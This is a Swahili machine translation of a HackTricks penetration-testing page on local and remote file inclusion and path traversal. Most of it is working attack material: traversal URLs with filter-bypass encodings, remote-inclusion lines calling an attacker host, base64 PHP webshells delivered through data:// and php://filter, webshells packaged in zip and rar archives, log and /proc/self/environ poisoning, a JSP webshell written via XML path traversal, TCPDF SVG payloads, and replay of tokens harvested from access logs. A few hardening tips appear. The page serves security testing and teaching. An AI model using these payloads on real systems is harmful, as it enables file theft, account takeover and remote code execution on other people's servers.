File Inclusion/Path traversal

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

File Inclusion

Remote File Inclusion (RFI): Faili inapakuliwa kutoka kwenye remote server (Bora: Unaweza kuandika code na server itaitekeleza). Katika php hii imezimwa kwa chaguo-msingi (allow_url_include).
Local File Inclusion (LFI): Local server inapakia faili ya ndani.

Udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna yoyote faili itakayopakiwa na server.

Function za PHP zilizo hatarini: require, require_once, include, include_once

Chombo muhimu ku-exploit udhaifu huu: https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

Nimechanganya orodha kadhaa za *nix LFI na kwa kuongeza njia zaidi nimeunda hii:

Auto_Wordlists/wordlists/file_inclusion_linux.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Pia jaribu kubadilisha / kwa \
Pia jaribu kuongeza ../../../../../

A list that uses several techniques to find the file /etc/password (to check if the vulnerability exists) can be found here

Windows

Muungano wa wordlists mbalimbali:

Auto_Wordlists/wordlists/file_inclusion_windows.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Pia jaribu kubadilisha / kwa \
Pia jaribu kuondoa C:/ na kuongeza ../../../../../

A list that uses several techniques to find the file /boot.ini (to check if the vulnerability exists) can be found here

OS X

Angalia orodha ya LFI ya Linux.

Misingi ya LFI na bypasses

Mifano yote ni kwa Local File Inclusion lakini inaweza kutumika pia kwa Remote File Inclusion (page=http://myserver.com/phpshellcode.txt\.

http://example.com/index.php?page=../../../etc/passwd

traversal sequences zimeondolewa bila kutumia recursion

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null byte (%00)

Bypass kuongezwa kwa herufi zaidi mwishoni mwa string iliyotolewa (bypass of: $_GET[‘param’].“php”)

http://example.com/index.php?page=../../../etc/passwd%00

Hili limekwisha kutatuliwa tangu PHP 5.4

Encoding

Unaweza kutumia encodings zisizo za kawaida kama double URL encode (na nyingine):

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

HTML-to-PDF SVG/IMG path traversal

Vifumo vya kisasa vya HTML-to-PDF (mfano TCPDF au wrappers kama html2pdf) vinatabasamu kuchambua HTML, SVG, CSS, na font URLs zilizotolewa na mshambulizi, lakini vinakwenda ndani ya mitandao ya backend inayotambulika yenye ufikiaji wa filesystem. Mara tu unapoweza kuingiza HTML ndani ya $pdf->writeHTML()/Html2Pdf::writeHTML(), unaweza mara nyingi exfiltrate faili za ndani ambazo akaunti ya web server inaweza kusoma.

• Fingerprint the renderer: kila PDF iliyotengenezwa ina uwanja wa Producer (mfano TCPDF 6.8.2). Kujua build kamili kunakuambia ni path filters zipi zipo na kama URL decoding hufanyika kabla ya validation.
• Inline SVG payloads: TCPDF::startSVGElementHandler() inasoma sifa ya xlink:href kutoka kwa elementi za <image> kabla ya kuendesha urldecode(). Kuingiza malicious SVG ndani ya data URI hufanya HTML sanitizers nyingi zisizingatie payload wakati TCPDF bado inachambua:

<img src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMCAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxpbWFnZSB4bGluazpocmVmPSIuLi8uLi8uLi8uLi8uLi90bXAvdXNlcl9maWxlcy91c2VyXzEvcHJpdmF0ZV9pbWFnZS5wbmciIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiLz48L3N2Zz4=" />

TCPDF inaweka $_SERVER['DOCUMENT_ROOT'] mbele ya paths zinazoanza na / na inatatua .. tu baadaye; kwa hivyo tumia sehemu za kuanzia ../../.. au /../../.. kuondoka kwenye root baada ya kuongezwa hapo awali.

• Encoding ili kuzipita vichujio rahisi: Toleo ≤6.8.2 hukagua tu kwa substring halisi ../ kabla ya ku-decode URL. Kutuma ..%2f (au ..%2F) ndani ya SVG au katika attribute ya raw <img src> hupita ukaguzi, kwa sababu mlolongo wa traversal dot-dot-slash unarejeshwa tena tu baada ya TCPDF kuita urldecode().
• Ku-encode mara mbili kwa ku-decoding ya hatua nyingi: Ikiwa input ya mtumiaji ina-decode na web framework na TCPDF, encode mara mbili slash (%252f). Decode moja inaiweka kuwa %2f, decode ya pili ndani ya TCPDF inaiweka kuwa /, ikatoa /..%252f.. → /../../../… bila kamwe kuonyesha ../ kwa filter za awali.
• HTML <img> handler: TCPDF::openHTMLTagHandler() ina mdudu sawa wa mpangilio wa operesheni, kuruhusu direct HTML payloads kama src="%2f..%252f..%252ftmp%252fsecret.png" kusoma bitmap yoyote inayofikika ndani.

Mbinu hii leaks chochote kinachosomwa na PDF worker (skani za paspoti, API keys rendered as images, n.k.). Hardeners waliirekebisha kwenye 6.9.1 kwa kutekeleza canonicalisation ya paths (isRelativePath()), kwa hivyo wakati wa majaribio zipa kipaumbele toleo za Producer za zamani.

Kutoka kwenye folda iliyopo

Huenda back-end inakagua path ya folda:

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

Kuchunguza Saraka za Mfumo wa Faili kwenye Seva

Mfumo wa faili wa seva unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, si faili tu, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kujaribu kuwepo kwa folda maalum. Hapa chini kuna njia ya kina ya kufanikisha hili:

1. Pima Kina cha Saraka: Tambua kina cha saraka unayo sasa kwa kufanikiwa kupata faili ya /etc/passwd (inatumika ikiwa seva ni Linux). Mfano wa URL unaweza kuundwa kama ifuatavyo, kuonyesha kina cha tatu:

http://example.com/index.php?page=../../../etc/passwd # depth of 3

2. Chunguza Folda: Ongeza jina la folda inayoshukiwa (kwa mfano, private) kwenye URL, kisha urudi /etc/passwd. Ngazi ya ziada ya directory inahitaji kuongeza depth kwa moja:

http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4

3. Tafsiri Matokeo: Jibu la server linaonyesha ikiwa folda ipo:

• Hitilafu / Hakuna Matokeo: Folda private inawezekana haipo mahali uliotajwa.
• Yaliyomo ya /etc/passwd: Uwepo wa folda private umethibitishwa.

4. Uchunguzi Rekursivu: Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa ajili ya katalogi ndogo au mafaili kwa kutumia mbinu ile ile au mbinu za jadi za Local File Inclusion (LFI).

Ili kuchunguza folda katika maeneo tofauti kwenye mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama /var/www/ ina folda private (ikiwa directory ya sasa iko kwa kina cha 3), tumia:

http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

Path Truncation Technique

Path truncation ni mbinu inayotumika kuendesha njia za faili katika programu za wavuti. Mara nyingi inatumika kufikia faili zilizozuiwa kwa bypassing hatua fulani za usalama zinazoongeza herufi mwishoni mwa njia za faili. Lengo ni kutengeneza njia ya faili ambayo, mara itakapobadilishwa na hatua za usalama, bado inaelekeza kwenye faili inayotakiwa.

Katika PHP, uwakilishi mbalimbali wa njia ya faili unaweza kutambuliwa kuwa sawa kutokana na tabia ya mfumo wa faili. Kwa mfano:

• /etc/passwd, /etc//passwd, /etc/./passwd, and /etc/passwd/ are all treated as the same path.
• When the last 6 characters are passwd, appending a / (making it passwd/) doesn’t change the targeted file.
• Similarly, if .php is appended to a file path (like shellcode.php), adding a /. at the end will not alter the file being accessed.

Mifano iliyotolewa inaonyesha jinsi ya kutumia path truncation kufikia /etc/passwd, lengo linalotumika mara kwa mara kutokana na maudhui nyeti (taarifa za akaunti za watumiaji):

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

Katika matukio haya, idadi ya traversals inayohitajika inaweza kuwa takriban 2027, lakini idadi hii inaweza kutofautiana kulingana na usanidi wa seva.

• Using Dot Segments and Additional Characters: Mfululizo wa traversal (../) uliounganishwa na dot segments za ziada na herufi unaweza kutumika kuvinjari mfumo wa faili, ukipuuza kwa ufanisi string zilizoongezwa na seva.
• Determining the Required Number of Traversals: Kupitia majaribio na makosa, mtu anaweza kubaini idadi sahihi ya mfululizo wa ../ zinazohitajika ili kufika kwenye root directory kisha /etc/passwd, kuhakikisha kwamba any appended strings (kama .php) zimefanywa kuwa zisizofanya kazi lakini njia inayotakiwa (/etc/passwd) inabaki bila kubadilishwa.
• Starting with a Fake Directory: Ni desturi ya kawaida kuanza njia na directory isiyokuwepo (kama a/). Mbinu hii inatumiwa kama tahadhari au kutimiza mahitaji ya mantiki ya path parsing ya seva.

When employing path truncation techniques, ni muhimu kuelewa tabia ya path parsing ya seva na muundo wa filesystem. Kila senario linaweza kuhitaji mbinu tofauti, na majaribio mara nyingi yanahitajika ili kupata mbinu yenye ufanisi zaidi.

This vulnerability was corrected in PHP 5.3.

Filter bypass tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

Remote File Inclusion

Katika php hili limezimwa kwa chaguo-msingi kwa sababu allow_url_include iko Off. Inapaswa kuwa On ili lifanye kazi, na katika hali hiyo unaweza kujumuisha faili ya PHP kutoka kwenye server yako na kupata RCE:

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

Ikiwa kwa sababu fulani allow_url_include iko On, lakini PHP inafanya filtering kwa ufikiaji wa kurasa za nje, kulingana na chapisho hiki, unaweza kutumia kwa mfano data protocol na base64 ku-decode b64 PHP code na kupata RCE:

PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt

Tip

Katika msimbo uliopita, +.txt ya mwisho iliongezwa kwa sababu mshambulizi alihitaji mnyororo ambao unamalizika kwa .txt, hivyo mnyororo unamalizika nayo na baada ya b64 decode sehemu hiyo itarudisha tu takataka na PHP halisi itajumuishwa (na kwa hivyo, itatekelezwa).

Mfano mwingine kutotumia itifaki ya php:// ungekuwa:

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt

Python Kipengele cha mzizi

Katika Python, katika msimbo kama huu:

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

Ikiwa mtumiaji atatuma absolute path kwa file_name, njia ya awali inaondolewa tu:

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

Hii ni tabia iliyokusudiwa kulingana na the docs:

Ikiwa kipengele ni njia kamili (absolute path), vipengele vyote vya awali vinatupwa na kujiunga kunaendelea kutoka kwenye kipengele cha njia kamili.

Java Orodha za saraka

Inaonekana kwamba ikiwa una Path Traversal katika Java na unaomba saraka badala ya faili, orodha ya saraka inarudishwa. Hii haijawahi kutokea katika lugha nyingine (afaik).

Vigezo 25 vya juu

Hapa kuna orodha ya vigezo 25 vya juu ambayo yanaweza kuwa hatarini kwa local file inclusion (LFI) (kutoka link):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI kutumia PHP wrappers & protocols

php://filter

PHP filters zinaruhusu kufanya msingi wa operesheni za mabadiliko kwenye data kabla ya kusomwa au kuandikwa. Kuna aina 5 za filters:

• String Filters:
• string.rot13
• string.toupper
• string.tolower
• string.strip_tags: Ondoa tags kutoka kwenye data (kila kitu kati ya herufi “<” na “>” )
• Note that this filter has disappear from the modern versions of PHP
• Conversion Filters
• convert.base64-encode
• convert.base64-decode
• convert.quoted-printable-encode
• convert.quoted-printable-decode
• convert.iconv.* : Inabadilisha kuwa encoding tofauti (convert.iconv.<input_enc>.<output_enc>). Ili kupata orodha ya encodings zote zinazotungwa kimbia kwenye consola: iconv -l

Warning

Kwa kutumia vibaya filter ya conversion convert.iconv.* unaweza kuunda maandishi yoyote, ambayo inaweza kuwa ya msaada kuandika maandishi yoyote au kufanya function kama include ichambue maandishi yoyote. Kwa maelezo zaidi angalia LFI2RCE via php filters.

• Compression Filters
• zlib.deflate: Inafinya maudhui (faidha ikiwa unahitaji ku-exfiltrate taarifa nyingi)
• zlib.inflate: Inafungua/decompress data
• Encryption Filters
• mcrypt.* : Imepitwa na wakati
• mdecrypt.* : Imepitwa na wakati
• Other Filters
• Ukikimbiza ndani ya php var_dump(stream_get_filters()); unaweza kupata chache za filters zisizotarajiwa:
• consumed
• dechunk: inarudisha HTTP chunked encoding
• convert.*

# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)

Warning

Sehemu “php://filter” haizingatii utofauti kati ya herufi kubwa na ndogo

Kutumia php filters kama oracle kusoma faili yoyote

In this post inapendekeza mbinu ya kusoma faili ya ndani bila kupata output ikirudishwa na server. Mbinu hii inategemea boolean exfiltration of the file (char by char) using php filters kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya maandishi kuwa makubwa vya kutosha kusababisha php kurusha exception.

Katika postu ya asili unaweza kupata maelezo ya kina ya mbinu, lakini hapa ni muhtasari wa haraka:

• Tumia codec UCS-4LE ili kuacha tabia ya kwanza ya maandishi mwanzoni na kufanya ukubwa wa string uongezeke kwa kasi (exponentially).
• Hii itatumika kuzalisha maandishi makubwa sana yanapotabiriwa herufi ya awali kwa usahihi kiasi kwamba php itasababisha kosa
• Filter ya dechunk ita futa kila kitu ikiwa char ya kwanza si hexadecimal, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
• Hii, ikichanganywa na ile ya awali (na filters nyingine kutegemea herufi iliyotabiriwa), itatuwezesha kutabiri herufi mwanzoni mwa maandishi kwa kuona wakati tunapofanya mabadiliko ya kutosha kuifanya isiwe tabia ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitaiangua na bomu la awali litasababisha kosa la php.
• Codec convert.iconv.UNICODE.CP930 inabadilisha kila herufi kuwa ile inayofuata (kwa hiyo baada ya codec hii: a -> b). Hii inatuwezesha kugundua ikiwa herufi ya kwanza ni a kwa mfano kwa sababu ikiwa tutaweka codec hii mara 6: a->b->c->d->e->f->g herufi haitakuwa tena tabia ya hexadecimal, kwa hivyo dechunk haitaiangua na kosa la php litasababishwa kwa sababu linazidisha na bomu la awali.
• Kwa kutumia mabadiliko mengine kama rot13 mwanzoni inawezekana leak chars nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kusogeza herufi nyingine ndani ya range ya hex).
• Wakati char ya awali ni nambari, inahitajika ku-encode kwa base64 na leak herufi 2 za kwanza ili kupata nambari.
• Shida ya mwisho ni kuona jinsi ya leak zaidi ya herufi ya awali. Kwa kutumia order memory filters kama convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE inawezekana kubadilisha mpangilio wa chars na kupata herufi nyingine za maandishi kwenye nafasi ya kwanza.
• Na ili kuwaze kupata further data wazo ni kutengeneza 2 bytes za data taka mwanzoni kwa convert.iconv.UTF16.UTF16, tumia UCS-4LE ili kuifanya pivot na 2 bytes zinazofuata, na dfuta data hadi data taka (hii itaondoa bytes 2 za kwanza za maandishi ya awali). Endelea kufanya hivyo hadi ufikie bit unayotaka ku-leak.

Katika post pia ilitoka tool ya kufanya hili moja kwa moja: php_filters_chain_oracle_exploit.

php://fd

Wrapper hii inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu ku-exfiltrate yaliyomo ya opened files:

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

Unaweza pia kutumia php://stdin, php://stdout and php://stderr kufikia file descriptors 0, 1 and 2 mtawalia (sijui jinsi hili litaweza kuwa muhimu katika shambulio)

zip:// na rar://

Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie.
Ili kuweza kutumia vibaya protocol ya rar, inahitaji kuamilishwa kwa njia maalum.

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kumbuka kwamba itifaki hii imezuiliwa na mipangilio ya php allow_url_open na allow_url_include

expect://

Expect inapaswa kuamilishwa. Unaweza kutekeleza msimbo kwa kutumia hii:

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

Taja payload yako katika vigezo vya POST:

curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

phar://

Faili ya .phar inaweza kutumika kutekeleza msimbo wa PHP wakati programu ya wavuti inapotumia functions kama include kwa ajili ya kupakia faili. Kipande cha msimbo wa PHP hapa chini kinaonyesha uundaji wa faili ya .phar:

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();

Ili kukusanya faili ya .phar, amri ifuatayo inapaswa kutekelezwa:

php --define phar.readonly=0 create_path.php

Baada ya kutekelezwa, faili inayoitwa test.phar itaumbwa, ambayo inaweza kutumiwa ku-exploit udhaifu wa Local File Inclusion (LFI).

Katika kesi ambapo LFI inasoma tu faili bila kuendesha PHP code ndani yake, kupitia functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), inaweza kujaribiwa ku-exploit deserialization vulnerability. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya phar.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:

Phar Deserialization Exploitation Guide

phar:// deserialization

CVE-2024-2961

Ilikuwa inawezekana kutumia mbaya any arbitrary file read from PHP that supports php filters kupata RCE. The detailed description can be found in this post.
Muhtasari mfupi: 3 byte overflow katika PHP heap ilitumiwa kubadilisha chain of free chunks za anspecific size ili kuwa na uwezo wa write anything in any address, hivyo hook iliongezwa kuita system.
Ilikuwa inawezekana ku-alloc chunks za sizes maalum kwa kutumia zaidi php filters.

Protokoli zaidi

Angalia protocols to include here:

• php://memory and php://temp — Andika kwenye memory au kwenye faili ya muda (sina uhakika jinsi hii inaweza kusaidia katika file inclusion attack)
• file:// — Kufikia filesystem ya ndani
• http:// — Kufikia HTTP(s) URLs
• ftp:// — Kufikia FTP(s) URLs
• zlib:// — Compression Streams
• glob:// — Kupata pathnames zinazofanana na pattern (Hairudii kitu chochote kinachoweza kuchapishwa, hivyo sio maana kubwa hapa)
• ssh2:// — Secure Shell 2
• ogg:// — Audio streams (Si ya maana kusoma arbitrary files)

LFI kupitia ‘assert’ ya PHP

Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa wakati unashughulika na function ya ‘assert’, ambayo inaweza kuendesha code ndani ya strings. Hii ni tatizo hasa endapo input yenye directory traversal characters kama “..” inachunguzwa lakini haisafishwa ipasavyo.

Kwa mfano, msimbo wa PHP unaweza kuandaliwa ili kuzuia directory traversal kama ifuatavyo:

assert("strpos('$file', '..') === false") or die("");

Wakati hili linakusudia kuzuia traversal, kwa bahati mbaya linaleta vector kwa ajili ya code injection. Ili kutumia hili kusoma maudhui ya faili, mshambuliaji anaweza kutumia:

' and die(highlight_file('/etc/passwd')) or '

Vivyo hivyo, kwa kutekeleza amri yoyote za mfumo, mtu anaweza kutumia:

' and die(system("id")) or '

Ni muhimu URL-encode these payloads.

PHP Blind Path Traversal

Warning

Mbinu hii inahusiana na kesi ambapo una control juu ya file path ya PHP function itakayofikia faili, lakini hutaona yaliyomo ya faili (kama simu rahisi ya file()) — yaliyomo hayajaonyeshwa.

In this incredible post it’s explained how a blind path traversal can be abused via PHP filter to exfiltrate the content of a file via an error oracle.

Kwa muhtasari, mbinu hiyo inatumia “UCS-4LE” encoding kufanya yaliyomo ya faili kuwa big kiasi kwamba PHP function opening faili itasababisha error.

Kisha, ili leak the first char, filter dechunk inatumiwa pamoja na nyingine kama base64 au rot13; hatimaye filters convert.iconv.UCS-4.UCS-4LE na convert.iconv.UTF16.UTF-16BE zinatumika kuweka herufi nyingine mwanzoni na leak them.

Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

Kwa maelezo ya kiufundi angalia post iliyotajwa!

LFI2RCE

Arbitrary File Write via Path Traversal (Webshell RCE)

Wakati server-side code inayopokea/uploads files inajenga destination path kwa kutumia data inayoendeshwa na mtumiaji (mfano, jina la faili au URL) bila ku-canonicalising na kuthibitisha, segments .. na absolute paths zinaweza kutoka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kawaida unapata unauthenticated RCE kwa kuangusha webshell.

Typical exploitation workflow:

• Tambua write primitive katika endpoint au background worker inayokubali path/filename na kuandika content kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, nk).
• Tambua web-exposed directories. Mifano ya kawaida:
• Apache/PHP: /var/www/html/
• Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
• IIS: C:\inetpub\wwwroot\ → drop shell.aspx
• Tengeneza traversal path inayotoka kwenye storage directory iliyokusudiwa kuingia webroot, na ujumuishe webshell yako.
• Tazama payload uliyoangusha na utekeleze amri.

Notes:

• The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
• Kwenye Java stacks, uandishi wa faili mara nyingi unatekelezwa kwa concatenation rahisi ya File/Paths. Ukosefu wa canonicalisation/allow-listing ndiyo kasoro kuu.

Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):

<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
<Command Type="SubmitQueueEntry">
<!-- Write outside the intake folder into the webroot via traversal -->
<Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
<Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
Process p = Runtime.getRuntime().exec(c);
try (var in = p.getInputStream(); var out = response.getOutputStream()) {
in.transferTo(out);
}
}
%>
]]>
</Data>
</Command>
</JMF>

Kuimarisha ili kuzuia aina hii ya mdudu:

• Tathmini hadi path ya canonical na uhakikishe kuwa ni subdirectory ya base directory iliyoorodheshwa.
• Kataa path yoyote inayojumuisha .., absolute roots, au drive letters; pendelea generated filenames.
• Endesha writer kama akaunti yenye ruhusa ndogo na tenganisha directories za kuandika kutoka kwa served roots.

Remote File Inclusion

Explained previously, follow this link.

Via Apache/Nginx log file

Ikiwa server ya Apache au Nginx ni vulnerable to LFI ndani ya include function unaweza kujaribu kufikia /var/log/apache2/access.log or /var/log/nginx/access.log, weka ndani ya user agent au ndani ya GET parameter php shell kama <?php system($_GET['c']); ?> na jumuisha faili hiyo

Warning

Kumbuka kwamba ukitumia double quotes kwa shell badala ya simple quotes, double quotes zitabadilishwa kuwa string “quote;”, PHP itatoa kosa huko na hakuna kingine kitakachotekelezwa.

Pia, hakikisha unaandika payload kwa usahihi au PHP itatoa kosa kila inapojaribu kupakia log file na hautakuwa na fursa ya pili.

Hii pia inaweza kufanywa katika logs nyingine lakini kuwa makini, code ndani ya logs inaweza kuwa URL encoded na hii inaweza kuharibu Shell. The header authorisation “basic” contains “user:password” in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.
Njia nyingine za logi zinazowezekana:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Soma access logs ili kuvuna GET-based auth tokens (token replay)

Programu nyingi hukubali kwa makosa session/auth tokens kupitia GET (mfano: AuthenticationToken, token, sid). Ikiwa una primitive ya path traversal/LFI kwenye web server logs, unaweza kuiba tokens hizo kutoka access logs na kuzireplay ili kupita authentication kabisa.

How-to:

• Tumia traversal/LFI kusoma web server access log. Eneo za kawaida:
• /var/log/apache2/access.log, /var/log/httpd/access_log
• /var/log/nginx/access.log
• Some endpoints return file reads Base64-encoded. If so, decode locally and inspect the log lines.
• Grep for GET requests that include a token parameter and capture its value, then replay it against the application entry point.

Mfano wa mtiririko (generic):

GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target

Dekodi mwili ikiwa ni Base64, kisha replay token iliyochukuliwa:

GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target

Vidokezo:

• Tokens katika URLs zinaandikwa kwa chaguo-msingi; kamwe usikubali bearer tokens kupitia GET katika mfumo wa uzalishaji.
• Ikiwa app inasaidia majina mingi ya tokens, tafuta funguo za kawaida kama AuthenticationToken, token, sid, access_token.
• Zungusha tokens yoyote ambazo zinaweza kuwa leaked katika logs.

Kupitia Barua Pepe

Tuma barua kwa akaunti ya ndani (user@localhost) inayobeba PHP payload yako kama <?php echo system($_REQUEST["cmd"]); ?> na jaribu include barua ya mtumiaji kwa njia kama /var/mail/<USERNAME> au /var/spool/mail/<USERNAME>

Kupitia /proc/*/fd/*

1. Pakia shells nyingi (kwa mfano: 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, na $PID = PID ya process (inaweza kufanywa kwa brute force) na $FD ni file descriptor (pia inaweza kufanywa kwa brute force)

Kupitia /proc/self/environ

Kama faili ya log, tuma payload katika User-Agent; itaonekana ndani ya /proc/self/environ

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Via upload

Ikiwa unaweza upload faili, ingiza tu shell payload ndani yake (e.g : <?php system($_GET['c']); ?> ).

http://example.com/index.php?page=path/to/uploaded/file.png

Ili kuweka faili iwe rahisi kusoma ni bora kuingiza katika metadata ya picha/doc/pdf

Kupitia upakuaji wa ZIP

Pakia faili la ZIP lenye PHP shell iliyopakizwa na upate:

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

Kupitia PHP sessions

Angalia kama tovuti inatumia PHP Session (PHPSESSID)

